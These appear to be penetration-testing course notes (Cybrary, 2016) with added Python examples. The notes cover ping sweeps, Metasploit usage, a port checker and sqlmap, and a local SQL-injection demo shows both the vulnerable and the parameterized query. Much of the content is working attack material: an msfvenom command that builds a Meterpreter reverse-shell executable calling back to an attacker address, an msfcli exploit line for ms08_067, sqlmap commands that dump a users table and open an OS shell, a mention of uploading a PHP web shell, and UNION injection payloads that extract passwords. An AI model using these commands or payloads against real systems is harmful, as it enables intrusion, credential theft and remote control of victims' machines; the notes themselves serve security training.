Source: "Advanced Penetration Testing" Cybrary

I. Pings a class C (/24) network and prints only the live hosts

#!/bin/bash
# Usage: ./pingscript.sh 192.168.20   (the first three octets of the network)
if [ "$1" == "" ]
then
    echo "Usage: ./pingscript.sh [network]"
    echo "example: ./pingscript.sh 192.168.20"
else
    for x in `seq 1 254`; do
        # keep only the reply lines, take the address field and drop its trailing colon
        # (add -W 1 on Linux to cap the wait for hosts that never answer)
        ping -c 1 "$1.$x" | grep "64 bytes" | cut -d" " -f4 | sed 's/.$//'
    done
fi

II. Make it executable: $: chmod +x [name of the bash script]
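The same sweep as an added Python example (not code from the Cybrary notes): it validates the prefix argument, pings the 254 hosts in parallel, and pulls the replying address out of ping's output with a regex instead of the fixed `cut -f4` field, which breaks as soon as ping prints a resolved hostname ("64 bytes from host.lan (192.168.20.1): ..."). It assumes a Linux iputils ping (`-c` count, `-W` per-reply timeout in seconds); `REPLY_RE`, `ping_sweep` and the other names are this example's own.

```python
#!/usr/bin/env python3
"""Added example (not from the Cybrary course notes): a /24 ping sweep that
validates its argument, pings in parallel and parses ping's reply lines with
a regex. Assumes a Linux iputils ping (-c, -W in seconds)."""
import re
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor
from typing import List, Optional

# Reply lines look like "64 bytes from 192.168.20.1: icmp_seq=1 ttl=64 time=0.2 ms"
# or, with reverse DNS, "64 bytes from host.lan (192.168.20.1): icmp_seq=1 ...".
# Error lines ("From 192.168.20.9 icmp_seq=1 Destination Host Unreachable") do not match.
REPLY_RE = re.compile(r"^\d+ bytes from (?:[^\s(]+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?:")


def valid_c_class_prefix(prefix: str) -> bool:
    """True for exactly three octets, each 0-255 (e.g. "192.168.20")."""
    parts = prefix.split(".")
    if len(parts) != 3:
        return False
    return all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def parse_ping_reply(output: str) -> Optional[str]:
    """Return the replying IPv4 address found in ping's stdout, or None."""
    for line in output.splitlines():
        m = REPLY_RE.match(line)
        if m:
            return m.group(1)
    return None


def ping_once(host: str, timeout: int = 1) -> Optional[str]:
    """Send one echo request; return the replying address or None."""
    proc = subprocess.run(
        ["ping", "-c", "1", "-W", str(timeout), host],
        capture_output=True, text=True, check=False,
    )
    return parse_ping_reply(proc.stdout)


def ping_sweep(prefix: str, workers: int = 64) -> List[str]:
    """Ping prefix.1 .. prefix.254 in parallel; return the live addresses in order."""
    if not valid_c_class_prefix(prefix):
        raise ValueError(f"expected a class C prefix like 192.168.20, got {prefix!r}")
    hosts = [f"{prefix}.{x}" for x in range(1, 255)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(ping_once, hosts))
    return [addr for addr in results if addr]


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("Usage: pingsweep.py [network]   example: pingsweep.py 192.168.20")
    for addr in ping_sweep(sys.argv[1]):
        print(addr)
```

Hosts that drop ICMP echo never show up in either version; for those, a TCP probe of a few common ports (as in the port check further down) or `nmap -sn` is the usual follow-up.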
Source: "Advanced Penetration Testing" Cybrary
*Exploitation framework
*Written in Ruby
*Modular: exploits, payloads, auxiliaries, and more

Terminology:
*Exploit: the vector for penetrating the system
*Payload: shellcode; what you want the exploit to do after exploitation
*Auxiliary: non-exploit modules such as scanners and information gathering
*Session: the connection resulting from a successful exploit

Interfaces: msfconsole, msfcli, Armitage
Utilities: msfpayload, msfencode, msfupdate, msfvenom
(msfcli, msfpayload and msfencode have since been removed from the framework; msfvenom replaces the latter two, and msfconsole -x runs one-liners.)

Traditional vs. Metasploit
Traditional exploit:
1. Find a public exploit
2. Replace offsets, return address, etc. for your target
3. Replace the shellcode
Metasploit:
1. Load the Metasploit module
2. Select the target
3. Select the payload

Metasploit payloads:
*Bind shell: opens a listening port on the victim machine; the attacker connects to it
*Reverse shell: the victim connects back to the attacker, which also works through NAT and egress filtering that would block a bind shell
*Inline (single): the full payload is in the exploit (e.g. windows/shell_reverse_tcp)
*Staged: a small stager calls back to the attacker to fetch the rest (e.g. windows/shell/reverse_tcp; the extra slash marks a staged payload)

msfcli [command line options]
O = show options
P = show payloads
E = run exploit
E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/reverse_tcp LHOST=10.0.0.100 E

Msfvenom: makes shellcode and standalone payloads
-l list modules
-f output format
-p payload to use
E.g., $: msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe

Multi/Handler
*Generic payload handler
*Catches payloads started outside of the framework, for example payloads built with msfvenom
msf> use multi/handler
$: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe
The handler's PAYLOAD, LHOST and LPORT must be set to the same values as in the msfvenom command before running exploit, or the callback is not caught.
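The bind-versus-reverse distinction above, as an added example in plain Python sockets (this is not Metasploit code and does not spawn a shell): the target side answers one request with a constructed banner, and in the reverse case the attacker side plays the role multi/handler plays. Everything runs on 127.0.0.1 with OS-chosen ports; `FAKE_REPLY`, `bind_shell_exchange` and `reverse_shell_exchange` are this example's own names.

```python
#!/usr/bin/env python3
"""Added example, not Metasploit code: the connection directions behind
bind and reverse payloads, reduced to TCP sockets on loopback. The target
answers one command with a constructed banner instead of running a shell."""
import socket
import threading
from typing import Tuple

LOCALHOST = "127.0.0.1"
# Constructed stand-in for what a real shell would return for "id".
FAKE_REPLY = b"uid=1000(victim)\n"


def _target_answers(conn: socket.socket) -> None:
    """Target side: read one command line, answer with FAKE_REPLY, hang up."""
    with conn:
        conn.recv(1024)
        conn.sendall(FAKE_REPLY)


def _attacker_talks(conn: socket.socket) -> bytes:
    """Attacker side: send a command and return what comes back."""
    with conn:
        conn.sendall(b"id\n")
        return conn.recv(1024)


def _listener(host: str) -> Tuple[socket.socket, int]:
    """Listen on a free port; return the socket and the port the OS chose."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def bind_shell_exchange() -> Tuple[int, bytes]:
    """Bind payload: the TARGET listens on RPORT and the attacker connects in.
    Returns (rport, reply seen by the attacker)."""
    srv, rport = _listener(LOCALHOST)

    def target_side():
        conn, _ = srv.accept()
        srv.close()
        _target_answers(conn)

    threading.Thread(target=target_side, daemon=True).start()
    attacker = socket.create_connection((LOCALHOST, rport), timeout=5)
    return rport, _attacker_talks(attacker)


def reverse_shell_exchange() -> Tuple[int, bytes]:
    """Reverse payload: the ATTACKER listens on LHOST:LPORT (multi/handler's
    job) and the target connects back to it. Returns (lport, reply)."""
    handler, lport = _listener(LOCALHOST)

    def target_side():
        # This is the part that runs on the victim, e.g. meterpreter.exe above,
        # with LHOST/LPORT baked in by msfvenom.
        _target_answers(socket.create_connection((LOCALHOST, lport), timeout=5))

    threading.Thread(target=target_side, daemon=True).start()
    conn, _ = handler.accept()
    handler.close()
    conn.settimeout(5)
    return lport, _attacker_talks(conn)


if __name__ == "__main__":
    print("bind   :", bind_shell_exchange())
    print("reverse:", reverse_shell_exchange())
```

The two functions differ only in which side calls listen()/accept() and which side connects, which is exactly why the handler's LHOST and LPORT must match what msfvenom baked into the reverse payload. A staged payload changes only what crosses the socket first: the handler sends the rest of the payload to the stager before any command.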
#!/usr/bin/env python3
# Connects to a single TCP port and reports whether it is open.
# (Python 3 version; the original used Python 2's raw_input()/print and a bare
# input() for the port, which in Python 2 eval()s whatever is typed.)
import socket

ip = input("Enter the ip: ")
port = int(input("Enter the port: "))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect_ex() returns 0 on success and an errno value on failure instead of raising
if s.connect_ex((ip, port)):
    print("Port", port, "is closed")
else:
    print("Port", port, "is open")
s.close()

1. Burp Suite -> Intruder
http://www.site.com/section.php?id=51

2. sqlmap
python sqlmap.py -u "http://www.site.com/section.php?id=51"
# Discover databases
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs
# Find tables in a particular database
python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D database_name
# Get columns of the table
python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D database_name -T users
# Get data from the columns
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D database_name -T users
# Get an interactive OS shell (needs file-write privileges on the DBMS and a writable web directory)
python sqlmap.py -u "http://www.site.com/section.php?id=51" --os-shell
# Upload a PHP shell, e.g. b374kshell.php
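The single-port connect_ex() check from the Python snippet above, extended as an added example (not from the course notes) to a list of ports with a per-connection timeout, so a port that silently drops the SYN cannot hang the scan, and so "filtered" (no answer) is reported separately from "closed" (RST). The loopback listener is constructed only to give the scan one port that is really open; `check_port`, `scan_ports` and `demo` are this example's own names.

```python
#!/usr/bin/env python3
"""Added example (not from the course notes): connect_ex() over several ports
with a timeout, distinguishing open / closed / filtered. Only 127.0.0.1 is
probed; the listener is constructed here so one port is genuinely open."""
import errno
import socket
from typing import Dict, Iterable, Tuple

# connect_ex() returns 0 on success and an errno otherwise. With a timeout
# set, a connect that never completes comes back as one of these rather than
# ECONNREFUSED, which is how "filtered" is told apart from "closed".
_TIMEOUT_ERRNOS = {errno.EAGAIN, errno.EWOULDBLOCK, errno.ETIMEDOUT}


def check_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Return "open", "closed" or "filtered" for one TCP port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            rc = s.connect_ex((host, port))
        except socket.timeout:   # some builds raise instead of returning EWOULDBLOCK
            return "filtered"
    if rc == 0:
        return "open"
    if rc in _TIMEOUT_ERRNOS:
        return "filtered"
    return "closed"              # typically ECONNREFUSED: the host answered with RST


def scan_ports(host: str, ports: Iterable[int], timeout: float = 1.0) -> Dict[int, str]:
    """Probe each port in the order given and map it to its state."""
    return {p: check_port(host, p, timeout) for p in ports}


def demo() -> Tuple[int, int, Dict[int, str]]:
    """Scan one open loopback port (a listener started here) and one port that
    was just released and is therefore closed. Returns (open_port, closed_port, results)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0: the OS picks a free port
    listener.listen(1)
    open_port = listener.getsockname()[1]

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                      # nothing listens on this port any more

    try:
        return open_port, closed_port, scan_ports("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()


if __name__ == "__main__":
    open_port, closed_port, results = demo()
    for port, state in results.items():
        print("Port", port, "is", state)
```

A full TCP connect like this completes the handshake, so it shows up in the target's logs; it is the simplest check, not the quietest one.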
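What the sqlmap commands above are exploiting in a URL like section.php?id=51, reproduced locally as an added example (not from the course notes) with Python's sqlite3 module: `section_title_vulnerable()` pastes the id parameter into the SQL the way a naive section.php would, and `section_title_fixed()` binds it as a parameter. The schema, rows and table names are constructed for the example; the payload constants are hand-written versions of the boolean test, table and column enumeration and dump that sqlmap automates. `--os-shell` is not reproduced.

```python
#!/usr/bin/env python3
"""Added example (not from the course notes): the injection behind
section.php?id=51, on an in-memory SQLite database with constructed data."""
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sections(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO sections VALUES (51, 'News'), (52, 'Staff');
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'alice', 'wonderland');
    """)
    return db


def section_title_vulnerable(db: sqlite3.Connection, raw_id: str) -> List[str]:
    """Vulnerable: the query-string value becomes part of the SQL text."""
    sql = "SELECT title FROM sections WHERE id = " + raw_id   # injection point
    return [row[0] for row in db.execute(sql)]


def section_title_fixed(db: sqlite3.Connection, raw_id: str) -> List[str]:
    """Fixed: reject anything that is not a number, then bind the value."""
    if not raw_id.isdigit():
        return []
    rows = db.execute("SELECT title FROM sections WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]


# Hand-written payloads for the id parameter, in the order sqlmap works:
# first prove the parameter is injectable, then enumerate, then dump.
PAYLOAD_TRUE = "51 AND 1=1"     # boolean test: page behaves like id=51
PAYLOAD_FALSE = "51 AND 1=2"    # boolean test: page behaves like an unknown id
# UNION ALL appends attacker-chosen rows to the legitimate result. sqlmap's
# --tables / --columns read the DBMS catalog; sqlite_master is SQLite's.
PAYLOAD_TABLES = "51 UNION ALL SELECT name FROM sqlite_master WHERE type='table'"
PAYLOAD_COLUMNS = "51 UNION ALL SELECT sql FROM sqlite_master WHERE name='users'"
PAYLOAD_DUMP = "51 UNION ALL SELECT username || ':' || password FROM users"  # --dump


if __name__ == "__main__":
    db = make_db()
    for p in (PAYLOAD_TRUE, PAYLOAD_FALSE, PAYLOAD_TABLES, PAYLOAD_COLUMNS, PAYLOAD_DUMP):
        print("id=" + repr(p))
        print("  vulnerable:", section_title_vulnerable(db, p))
        print("  fixed     :", section_title_fixed(db, p))
```

The true/false pair is the cheapest check before reaching for sqlmap: if id=51 AND 1=1 renders like id=51 and id=51 AND 1=2 renders like a missing section, the parameter is injectable. The UNION payloads only work once the column count of the original SELECT is known (one here), which is the part sqlmap brute-forces.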
Author: Vitali Kremez
July 2016